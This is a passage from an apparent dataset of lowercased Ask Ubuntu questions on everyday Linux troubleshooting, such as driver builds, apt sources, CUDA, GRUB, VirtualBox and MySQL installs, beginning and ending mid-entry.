-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : gir1.2-gconf-2.0 python-pyudev suggested packages : python-qt4 python-pyside.qtcore the following new packages will be installed : gir1.2-gconf-2.0 python-pyudev touchpad-indicator 0 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 84.1 kb of archives . after this operation , 1,136 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //ppa.launchpad.net/atareao/atareao/ubuntu/ precise/main touchpad-indicator all 0.9.3.12-1ubuntu1 [ 46.5 kb ] get:2 http : //archive.ubuntu.com/ubuntu/ precise/main gir1.2-gconf-2.0 amd64 3.2.5-0ubuntu2 [ 7,098 b ] get:3 http : //archive.ubuntu.com/ubuntu/ precise/main python-pyudev all 0.13-1 [ 30.5 kb ] fetched 84.1 kb in 2s ( 31.6 kb/s ) selecting previously unselected package gir1.2-gconf-2.0 . ( reading database ... 169322 files and directories currently installed . ) unpacking gir1.2-gconf-2.0 ( from ... /gir1.2-gconf-2.0_3.2.5-0ubuntu2_amd64.deb ) ... selecting previously unselected package python-pyudev . unpacking python-pyudev ( from ... /python-pyudev_0.13-1_all.deb ) ... selecting previously unselected package touchpad-indicator . unpacking touchpad-indicator ( from ... /touchpad-indicator_0.9.3.12-1ubuntu1_all.deb ) ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... processing triggers for software-center ... info : softwarecenter.db.update : no translation information in database needed setting up gir1.2-gconf-2.0 ( 3.2.5-0ubuntu2 ) ... setting up python-pyudev ( 0.13-1 ) ... setting up touchpad-indicator ( 0.9.3.12-1ubuntu1 ) ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - command sudo apt-get install linux-headers-generic build-essential wget http : //www.orbit-lab.org/kernel/compat-wireless-3-stable/v3.6/compat-wireless-3.6.6-1-snpc.tar.bz2 tar jxvf compat-wireless-3.6.6-1-snpc.tar.bz2 sudo su ./scripts/driver-select ath9k output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - processing new driver-select request ... backing up makefile : makefile.bk backup exists : makefile.bk backup exists : makefile.bk backup exists : makefile.bk backup exists : makefile.bk backing up makefile : drivers/net/wireless/makefile.bk backing up makefile : drivers/net/wireless/ath/makefile.bk backing up makefile : net/wireless/makefile.bk backing up makefile : drivers/ssb/makefile.bk backing up makefile : drivers/bcma/makefile.bk backing up makefile : drivers/misc/eeprom/makefile.bk backup exists : makefile.bk -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - next command make output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ./scripts/gen-compat-autoconf.sh /home/ritwik/compat-wireless-3.6.6-1-snpc/.config /home/ritwik/compat-wireless-3.6.6-1-snpc/config.mk > include/linux/compat_autoconf.h make -c /lib/modules/3.2.0-67-generic/build m=/home/ritwik/compat-wireless-3.6.6-1-snpc modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-67-generic' cc [ m ] /home/ritwik/compat-wireless-3.6.6-1-snpc/compat/main.o in file included from /home/ritwik/compat-wireless-3.6.6-1-snpc/include/linux/compat-2.6.h:64:0 , from < command-line > :0 : /home/ritwik/compat-wireless-3.6.6-1-snpc/include/linux/compat-3.4.h:32:21 : error : redefinition of ‘kmalloc_array’ include/linux/slab.h:243:21 : note : previous definition of ‘kmalloc_array’ was here make [ 3 ] : *** [ /home/ritwik/compat-wireless-3.6.6-1-snpc/compat/main.o ] error 1 make [ 2 ] : *** [ /home/ritwik/compat-wireless-3.6.6-1-snpc/compat ] error 2 make [ 1 ] : *** [ _module_/home/ritwik/compat-wireless-3.6.6-1-snpc ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-67-generic' make : *** [ modules ] error 2 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- next command make install output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- make -c /lib/modules/3.2.0-67-generic/build m=/home/ritwik/compat-wireless-3.6.6-1-snpc modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-67-generic' cc [ m ] /home/ritwik/compat-wireless-3.6.6-1-snpc/compat/main.o in file included from /home/ritwik/compat-wireless-3.6.6-1-snpc/include/linux/compat-2.6.h:64:0 , from < command-line > :0 : /home/ritwik/compat-wireless-3.6.6-1-snpc/include/linux/compat-3.4.h:32:21 : error : redefinition of ‘kmalloc_array’ include/linux/slab.h:243:21 : note : previous definition of ‘kmalloc_array’ was here make [ 3 ] : *** [ /home/ritwik/compat-wireless-3.6.6-1-snpc/compat/main.o ] error 1 make [ 2 ] : *** [ /home/ritwik/compat-wireless-3.6.6-1-snpc/compat ] error 2 make [ 1 ] : *** [ _module_/home/ritwik/compat-wireless-3.6.6-1-snpc ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-67-generic' make : *** [ modules ] error 2 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- not able to find ( drivers/net/wireless/ath/ath9k/hw.c ) or ( drivers/net/wireless/ath/ath9k/hw.h )
515354	adding a path to $ path	my java files are in /home/joe/learning/java folder , but can not run them in home directory . works fine when i change to the specific directory . how can i add this to my $ path . i tried so many . but no avail . can someone help
515361	ubuntu 14.04 and tcsh	i 've tried the recommended method to install the tcsh shell in ubuntu 14.04 , sudo apt-get install tcsh but get the message : unable to locate package tcsh is there something else i need to download ?
515363	ubuntu gnome 14.04 - 100 % cpu usage alternating between cores	i 've noticed my ubuntu gnome 14.04 has been getting a bit sluggish lately - things like gnome shell overview animation are jerky where they were lightning fast , elder scrolls online is stuttering and dropping to low fps where i previously had a solid 50-60 fps . out of interest i looked at the cpu history , and when running nothing but the system monitor , i was getting this : that was 15 minutes ago . the 100 % load seemed to be alternating between the cores . pc specs : i3 2130 processor . 8gb ddr3 ram . asus p8-z77m motherboard . samsung 128gb ssd i 've been trying to reproduce the problem , and while i 'm not getting the 100 % any more at idle , the system monitor is showing an average load of about 20-30 % , that 's with just chrome and the system monitor open . oddly , if i touch nothing , it 'll average out to about 20 % - if i start moving the mouse around and do some typing , it 's closer to 40 % . is this normal ? any help appreciated , i would n't even know where to start here..
515366	unexpected arabic messages below mouse pointer in libreoffice - a virus ?	this is weird . today i opened an excel file with libreoffice . suddenly i saw the mouse changed color , and stuck to it was a message in arabic , which changed every second in a loop . i can actually read arabic so i immediately recognized it as islamic messages praising allah ( including the takbir ) . here 's a screenshot : at first i thought this was something with the file , but then i saw that this happens with any libreoffice program ( but only libreoffice programs ) , and even when they 're open , it only changes the mouse when it 's hovering over the libreoffice program , and goes back to normal anywhere else . also , re-installing did not i tried running software updater - but i have an error where it could n't load some steam repositories , but that seems like a coincidence : failed to fetch http : //repo.steampowered.com/steam/dists/precise/steam/i18n/translation-en_us failed to fetch http : //repo.steampowered.com/steam/dists/precise/steam/i18n/translation-en here 's another hint - i tried taking several screenshot of several messages , but they all ended up showing the same message ( the one above ) . hopefully that means anything . i should note i have n't installed anything fishy lately , and i hardly ever use libreoffice at all ( i prefer google drive whenever i need to work with documents ) , so i 'm really unsure as to how this happened . anyway , this is scary .
515367	uninstall calibri font , installed from windows ' font directory	i use a pc with both ubuntu and windows 7 . i tried to install the calibri font in ubuntu by opening the calibri.ttf file found under the windows/fonts directory using font viewer and clicked on the install button . now i need to uninstall that font but i ca n't . font viewer shows me that the `` calibri regular '' font is installed but does not allow me to uninstall it . font manager does not show calibri in the font list . character map does not show calibri in the font list . ubuntu software center and synaptic do n't find anything like `` calibri '' . there is also no calibri file under these directories : /usr/share/fonts /usr/local/share/fonts ~/.fonts the font is visible to libreoffice , chrome , firefox .
515369	unable to use net using aircel 3g dongle by micromax	i 'm using ubuntu 14.04 gnome and i 'm unable to use internet through my dongle . i 've tried all the commands listed in run file provided by the dongle , still no results , how to go about this problem ?
515370	installing ubuntu dektop , but using as a server	is it possible to use ubuntu desktop as a server ? can i host a website on it ? what are the additional packages i need to install to make my system both as a desktop and a server
515373	i am not able to disable certain keys even after using xmodmap	some of the keys on my keyboard are continously pressed . i am trying to disable that key using the following command : xmodmap -e 'keycode 115=' or xmodmap -e 'keycode 115='nosymbol' it works for some time , i can see the symbol associated with that key getting updated using xev command . but the problem is it gets changed to it 's default symbol after some time and starts creating the problem again . how can i overcome this issue .
515376	how to activate the root user and delete user 1 on console	first , i know this must be the a question asked so often , that you could not count it 's duplicates . but all i found here has not solved my problem . how to activate the root user after a fresh install and give him all privileges sp that i could delete the 1001 user after that . this is to recreate a server environment created with ubuntu 14.04 where only a root user is active .
515377	ubuntu 12.04 very slow especially with android studio	i have an old laptop with the following specification : memory : 485 mib , processor : genuine intel cpu t2300 @ 1.66 ghz ă2 , os type : 32 bit , disk : 78.1 gb , i installed on it ubuntu 12.04 lts and i noticed that the overall system is very slow in responding . i tried to search about that in the internet and i found some articles talking about how to make ubuntu 12.04 lts run fast i applied all what they said including download lxde desktop environment and then nothing different in the system response time . then i need to develop some android applications so , i download android studio ( beta ) 0.8.6 . the problem became worse than before whenever i tried to open the android studio the screen is frozen for some minutes then it took time to download the projects and initialize the work space also , when i tried to move the cursor he is move very slowly . when i tried to run my first application on the avd it took three hours and still not run yet . i delete the android studio and install it again several times , i was trying to solve the problem but still nothing change . please if you have any suggestions that may help me make my laptop and android studio work faster i will appreciate it for you . thank you in advance .
515379	sharing files between ubuntu 14.04 and windows 8	i have ubuntu and windows 8 installed on one system . i am trying to share files between these two operating systems using an ntfs partition wich was created by windows . i do n't have trouble accessing the data on this partition from ubuntu , however if i create a file in ubuntu , this file does n't show up when i boot into windows . does anyone know how to do this . from what i have read file sharing should work without installing any additional software , as i am not trying to access the linux ext4 partition from windows .
515381	ubuntu 14.04 key arrow up is being pressed by itself	keyboard 's up arrow key is keep pressing itself every few seconds . i tried to install ubuntu 14.04 via boot cd , even before installation the arrow key was being pressed by itself . i tried to use ubuntu first without installing it and then tried to install it from there , the issue seemed to be fixed . i was using the pc for months until out of the blue the issue came back . it is not a hardware issue ! thank you in advance .
515382	while installing wine - got package 'wine1.5 ' has no installation candidate	i am new to ubunto hence not aware about basics of using ubunto . i wanted to install rar password cracker for which i ran the .exe file which gave me following error : 'an error occurred while loading the archive ' . then i came to know that after installing wine , it will be possible to run my .exe file . but when i try to install wine from 'ubuntu software center ' , i am getting another error saying 'package dependencies can not be resolved ' . i am stuck now . kindly help . i am using ubuntu 12.04 lts
515384	installing gnome screenshot	i followed this advice default save directory for gnome-screenshot ? and installed it as the top answer suggested . but the `` screenshot '' does not appear ( see image ) . https : //www.dropbox.com/s/ud2p8bv8v3z0w9m/snapshot7.png ? dl=0 and here is my installation https : //www.dropbox.com/s/c0gnxuead911dzc/snapshot8.png ? dl=0 edit , myabe this should be a different quesiton now , but i looked in the preferences for ksnapshot and googled for it but could find no way to do it . what i want to achieve is : each time i press prtsc or ctrl+prsc i save a file named screenshot_todaysdate to /dropbox/folder and then the url is pasted to my clipboard .
515388	how to assign keyboard shortcuts to already opened windows	let 's say i have opened four calc windows , two nautilus windows and , say , celestia . how can i register keyboard shortcuts to switch between them with one key-combo ?
515391	unable to connect to internet on hyper v ubuntu 14.04	i have set up ubuntu 14.04 on hyper-v in windows 8.1 . i also have an external network switch linked to ethernet . the internet and lan works fine on my host windows 8.1 pc . but i am not able to use internet on ubuntu hyper-v , although i am able to use lan ( internal network of my organization ) on ubuntu hyper-v . please help me resolving the issue .
515392	cuda 6.5 not performing any computation under ubuntu 14.04 64bit	i 've installed cuda 6.5 on my system ( i did not want to use 5.5 since there are some features after version 6 that i need ) . my system is a notebook with an nvidia gpu , namely lspci | grep -i nvidia 03:00.0 3d controller : nvidia corporation gm108m [ geforce 840m ] ( rev a2 ) i assume , that i installed cuda correctly since i did not get any errors during the installation , and this seems to be correct nvcc -- version nvcc : nvidia ( r ) cuda compiler driver copyright ( c ) 2005-2014 nvidia corporation built on thu_jul_17_21:41:27_cdt_2014 cuda compilation tools , release 6.5 , v6.5.12 nsight is also there . i am able to compile simple examples and run them , however , there is no gpu computation performed and also no device detected ( cudagetdevicecount=0 ) . i 'm using the example presented here at this website . but instead of printing `` hello world '' , i get `` hello hello '' . this lets me assume , that the computation on the kernel simply does not happen . i do n't know if this is strange : nvidia-smi sun aug 24 13:00:55 2014 + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | nvidia-smi 340.32 driver version : 340.32 | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- + | gpu name persistence-m| bus-id disp.a | volatile uncorr . ecc | | fan temp perf pwr : usage/cap| memory-usage | gpu-util compute m. | |===============================+======================+======================| | 0 geforce 840m off | 0000:03:00.0 n/a | n/a | | n/a 48c p0 n/a / n/a | 480mib / 2047mib | n/a default | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- + + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ | compute processes : gpu memory | | gpu pid process name usage | |=============================================================================| | 0 not supported | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ why does it say not supported for compute processes ? i would like to know if i forgot to configure something for cuda to work properly . i really want to avoid reinstalling nvidia drivers for my gpu since this has caused a lot of problems in the past . i 'm afraid i could destroy something . here 's an image of my nvidia settings . and additionally uname -a linux zenbook 3.13.0-34-generic # 60-ubuntu smp wed aug 13 15:45:27 utc 2014 x86_64 x86_64 x86_64 gnu/linux if you need further information , please let me know . thank you very much !
515395	installation problems of ubuntu via virtualbox in my windows 7 64 bit	i am really unhappy while installing ubuntu 14.4.01 via virtualbox in my windows 7 professional 64 bit operating system . ***i am using virtualbox-4.3.14-95030-win i am finding these problems while installing : > > > when i click on `` start '' for the installation , i have found this message : '' virtualbox - error in supr3hardenedwininstallhooks '' '' failed to install ntcreatesection monitor : e9 5b eb 15 0 0 0 0f 5 c3 f 1f 44 0 0 ( rc=-8 ) '' > > > then when i am clicking on `` abort '' button i have found this : '' virtualbox - error '' failed to open a session for the virtual machine ubuntu . the virtual machine ubuntu has terminated unexpectedly during startup with exit code 1 details : failed to open a session for the virtual machine ubuntu . the virtual machine 'ubuntu ' has terminated unexpectedly during startup with exit code 1 . result code : e_fail ( 0x80004005 ) component : machine interface : imachine { 480cf695-2d8d-4256-9c7c-cce4184fa048 } `` so , how can i solve the problem ? please , reply as early as possible . waiting for your reply ... mahtab .
515400	ubuntu 14.04 server sleeps after login screen	i recently installed ubuntu 14.04 lts , the server starts to boot just fine and it gets to the login screen it takes 4 seconds and it goes to sleep mode i think as i can hear the psu fan running but i can not resume , ping or do anything but restart it manually ( pressing the power button ) if i go in recovery mode it doesnt have this issue , any hints will be appreciatted . cheers ,
515401	is restarting lightdm likely to cause any serious problems ?	i frequently mess things up and i have to restart the computer . recently , i started restarting lightdm / gdm , as it is quicker . is that a sensible thing to do ? i use the following command ( in tty ) : sudo service lightdm restart or sudo service gdm restart would it be better to restart the computer with sudo shutdown -r now
515406	hdd partition delete using linux bootable disc : manually from shell/ cui environment	please let me know what are the commands and their syntax for 1 ) display all partitions from shell 2 ) delete any/ all partition from shell requirement/ situation : in some machine there was ubuntu installed on it . after that they have tried windows . now it is showing no space in hdd when trying to install windows again . so , it is required to delete all the partitions using `` linux startup disc '' manually to retrieve all the partitions occupied by linux . so , i need to know the commands that can be executed from the shell .
515407	how ( recipe ) to build only one kernel module ?	i have a bug in a linux kernel module that causes the stock ubuntu 14.04 kernel to oops ( crash ) . that is why i want to edit/patch the source of only that single kernel module to add some extra debug output . the kernel module in question is mvsas and not necessary to boot . for that reason i do n't see any need to update any initrd images . i have read a lot of information ( as shown below ) and find the setup and build process confusion . i need two recipes : to setup/configure the build environment once steps to do after editing any source file of this kernel module ( .c and .h ) and converting that edit into a new kernel module ( .ko ) the sources that have been used are : build one kernel module - google search http : //www.linuxquestions.org/questions/linux-kernel-70/rebuilding-a-single-kernel-module-595116/ http : //stackoverflow.com/questions/8744087/how-to-recompile-just-a-single-kernel-module http : //www.pixelbeat.org/docs/rebuild_kernel_module.html how do i build a single in-tree kernel module ? http : //ubuntuforums.org/showthread.php ? t=1153067 http : //ubuntuforums.org/showthread.php ? t=2112166 http : //ubuntuforums.org/showthread.php ? t=1115593 build one kernel module ubuntu - google search 'make +single +kernel +module ' - ask ubuntu 'make +kernel +module ' - ask ubuntu my makefile results in : no rule to make target `arch/x86/tools/relocs.c ' , needed ' '' invalid module format '' ' - ask ubuntu driver installation : compiling source code for newer kernel modprobe : 'invalid nodule format ' , yet works after insmod '' symbol version dump '' `` is missing '' - google search http : //stackoverflow.com/questions/9425523/should-i-care-that-the-symbol-version-dump-is-missing-how-do-i-get-one where can i find the corresponding module.symvers and .config files for 12.04.3 i386 server ? `` no symbol version for module_layout '' when trying to load usbhid.ko broken links inside linux header file folder 'make modules_install ' - ask ubuntu 'modules_install ' - ask ubuntu empty build directory in custom compiled kernel not able to see pr_info output in which directory are the kernel source files and how can i recompile it ? how can i compile and install that patched libata-eh.c file ? 'modules_install +depmod ' - ask ubuntu modules_install depmod - google search '' make modules_install '' - google search http : //www.csee.umbc.edu/courses/undergraduate/cmsc421/fall02/burt/projects/howto_build_kernel.html http : //unix.stackexchange.com/questions/20864/what-happens-in-each-step-of-the-linux-kernel-building-process https : //wiki.ubuntu.com/kernelcustombuild http : //www.cyberciti.biz/tips/build-linux-kernel-module-against-installed-kernel-source-tree.html http : //www.linuxforums.org/forum/kernel/170617-solved-make-modules_install-different-path.html '' make prepare '' - google search '' make prepare '' `` scripts/kconfig/conf -- silentoldconfig kconfig '' - google search http : //ubuntuforums.org/showthread.php ? t=1963515 ubuntu `` make prepare '' version - google search http : //stackoverflow.com/questions/8276245/how-to-compile-a-kernel-module-against-a-new-source https : //help.ubuntu.com/community/kernel/compile how do i compile a kernel module ? how to add a custom driver to my kernel ? compile and loading kernel module without compiling the kernel
515410	how to uninstall lubuntu and install windows	i have an hp mini 210 running lubuntu and it 's too confusing for me so i want to reinstall windows . i did a clean install of lubuntu so i have downloaded and created a bootable usb for windows 7 however it does n't seem to work - it gives me an error . what 's the procedure to remove lubuntu and install windows ? i have no disk drive , only usb . thanks ! tim , i already checked that thread . if you read my question you will see that my bootable usbs do n't seem to be working , the error i get is : in unetbootin i have an option to boot into 'default' when i press enter it just flashes the same screen back up and does n't boot anything .
515412	problem understanding a grub.cfg line with search.fs_uuid	while learing and adjusting my boot setup , i am stuck unterstanding this content in my grub.cfg on the efi patition of my drive : search.fs_uuid < uuid > root hd8 , gpt5 set prefix= ( $ root ) '/boot/grub' my hunch is that this finds a specific uuid , sets this as root , then sets root to hd8 , gpt5 and then sets the prefix with that root-var setup in order to find the grub loader at the right place . now hd8 , gpt5 and the uuid are my troubles . my drive with this grub.cfg and efi folder has the /boot/grub on the fith partition and is a gpt drive - so gpt5 seems ok. hd8 seems odd , as i do boot this drive i would have expected it to be hd0 . and the uuid i thought it should be the one of the gpt5 partition , but maybe this should be the drives uuid ? ! could someone please explain what is happening here and what the correct values for /boot/grub on a fitht partition of a gpt drive should be ? thanks !
515414	lenovo t410 trackpad issues	i recently bought a used lenovo t410 specifically to try ubuntu but i 'm having really frustrating problems with the trackpad . it seems to randomly lose the ability to click with any of the buttons or from tapping . i have only been able to resolve this by restarting but it happens so frequently that it has made for a very frustrating experience ! if anyone can offer any advice i would be very grateful , bear in mind i am an ubuntu/linux novice so an idiot 's guide would be very welcome indeed ! : ) best wishes , steve
515415	error when trying to install mysql server in ubuntu server 12.04 lts	i try to reinstall mysql server in my ubuntu 12.04 lts server and i get always the same error . configuring mysql-server-5.5 unable to set password for the mysql `` root '' user an error occurred while setting the password for the mysql administrative user . this may have happened because the account already has a password , or because of a communication problem with the mysql server . you should check the account 's password after the package installation . please read the /usr/share/doc/mysql-server-5.5/readme.debian file for more information . please find attached the screen shot in the link : screenshot i searched a lot in all forums for similar cases and i followed all recommended commands without success . does anybody have an idea how can i solve this ?
515418	accessing hard drive - have been trying for days	i have spent days reading everything i came across in the attempt to access files from my internal hard drive on a windows 7 computer that no longer works . i do n't know what the problem is . i finally got a usb stick with ubuntu 14.04 on it and that seems to work just fine . i can not access my hard drive . it might be there but i do n't know . i see a 4.1 gb hard disk ( /dev/sda ) in devices from disks . but i just do n't know how to access it . i somehow managed to get to : root @ ubuntu : ~ # but do n't know what to do from there , if anything . is there any place where a complete computer idiot can get step by step , easy to follow instructions ? i would really like to access my hard drive and pull a couple files off it before it gets sent in to the shop . i really do n't have much computer knowledge but would greatly appreciate any help !
515421	shared .purple directory with other user	i want to have this same archive of pidgin for two users . i figured out that i have to move existing .purple directory to directory available by both users , and then create symbolic links . but i have problem with first part user1 @ workstation $ tail -n 1/etc/group pidginarch : x:1004 : user1 , user2 user1 @ workstation $ cd / user1 @ workstation $ sudo mkdir pidginarch user1 @ workstation $ sudo chgrp -r pidginarch pidginarch/ user1 @ workstation $ sudo chmod -r g+w pidginarch/ user1 @ workstation $ cd pidginarch/ user1 @ workstation $ touch test touch : can not touch âtestâ : permission denied what i am doing wrong ?
515424	failed to fetch repositories ; a particular case	this is the question with many answers but i am not sure how to apply them . i please for the particular solution : what to add or remove by changing to comment in the following files and what to check or uncheck in the following dialog windows . now , the ubuntu 12.04 update manager tells : `` software updates may be available for your computer . the package information was last updated 61 days ago . press the 'check ' button below to check for new software updates . '' clicking at the 'check ' button results in a warning `` failed to download repository information . check your internet connection . '' with details w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) -proposed/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/restricted/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) -security/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) -updates/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) /source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/universe/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/main/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/multiverse/source/sources 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) -proposed/binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/restricted/binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) -security/binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) -updates/binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/-cs ) /binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/universe/binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/main/binary-i386/packages 404 not found , w : failed to fetch http : //ddebs.ubuntu.com/dists/ $ ( lsb_release/multiverse/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . the internet connection is ok. my /etc/apt/sources.list contains # deb cdrom : [ ubuntu 12.04.2 lts precise pangolin - release i386 ( 20130213 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //cz.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //cz.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //cz.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //cz.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //cz.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //cz.archive.ubuntu.com/ubuntu/ precise universe deb http : //cz.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //cz.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //cz.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //cz.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //cz.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //cz.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //cz.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //cz.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //ddebs.ubuntu.com $ ( lsb_release -cs ) -proposed restricted -cs ) -security -cs ) -updates -cs ) universe main multiverse deb-src http : //ddebs.ubuntu.com $ ( lsb_release -cs ) -proposed restricted -cs ) -security -cs ) -updates -cs ) universe main multiverse my /etc/apt/sources.list.d/precise-partner.list contains deb http : //archive.canonical.com/ubuntu precise partner # added by software-center . my /etc/apt/sources.list.d/webupd8team-y-ppa-manager-precise.list contains deb http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu precise main deb-src http : //ppa.launchpad.net/webupd8team/y-ppa-manager/ubuntu precise main and further files in the directory do not seem to contain anything relevant for the failure . the ubuntu software center ... edit ... .'software sources ' shows a window pictured at following screenshots : `` http : //tpeceny.nazory.cz @ tpeceny.nazory.cz/soubory_k_ubuntu/software % 20sources1.png '' '' http : //tpeceny.nazory.cz @ tpeceny.nazory.cz/soubory_k_ubuntu/software % 20sources2.png '' '' http : //tpeceny.nazory.cz @ tpeceny.nazory.cz/soubory_k_ubuntu/software % 20sources3.png '' '' http : //tpeceny.nazory.cz @ tpeceny.nazory.cz/soubory_k_ubuntu/software % 20sources4.png '' . i have a further pc , almost identical , with the same ubuntu software . the problem with such update failures at the second pc has been solved by mere clicking at some control at its update manager . probably i have missed the opportunity with the pc described above and i do not know how to repair it . thanks ! i am editing it after the 'mark kirby 's answer and my comment to be able to show clearly the steps . the /etc/apt/sources.list file from the second pc contains two more lines deb ddebs.ubuntu.com $ ( lsb_release -cs ) -proposed restricted -cs ) -security -cs ) -updates -cs ) universe main multiverse deb-src ddebs.ubuntu.com $ ( lsb_release -cs ) -proposed restricted -cs ) -security -cs ) -updates -cs ) universe main multiverse . after using it the update manager says 'the software on this computer is up to date. ' . the /etc/apt/sources.list file resulting from the steps in the answer is different ; it contains # deb cdrom : [ ubuntu 12.04.2 lts precise pangolin - release i386 ( 20130213 ) ] / precise main restricted deb-src http : //archive.ubuntu.com/ubuntu precise main restricted # added by software-properties # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //cz.archive.ubuntu.com/ubuntu/ precise main restricted universe deb-src http : //cz.archive.ubuntu.com/ubuntu/ precise restricted main multiverse universe # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . deb http : //cz.archive.ubuntu.com/ubuntu/ precise-updates main restricted universe deb-src http : //cz.archive.ubuntu.com/ubuntu/ precise-updates restricted main multiverse universe # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //cz.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //cz.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : 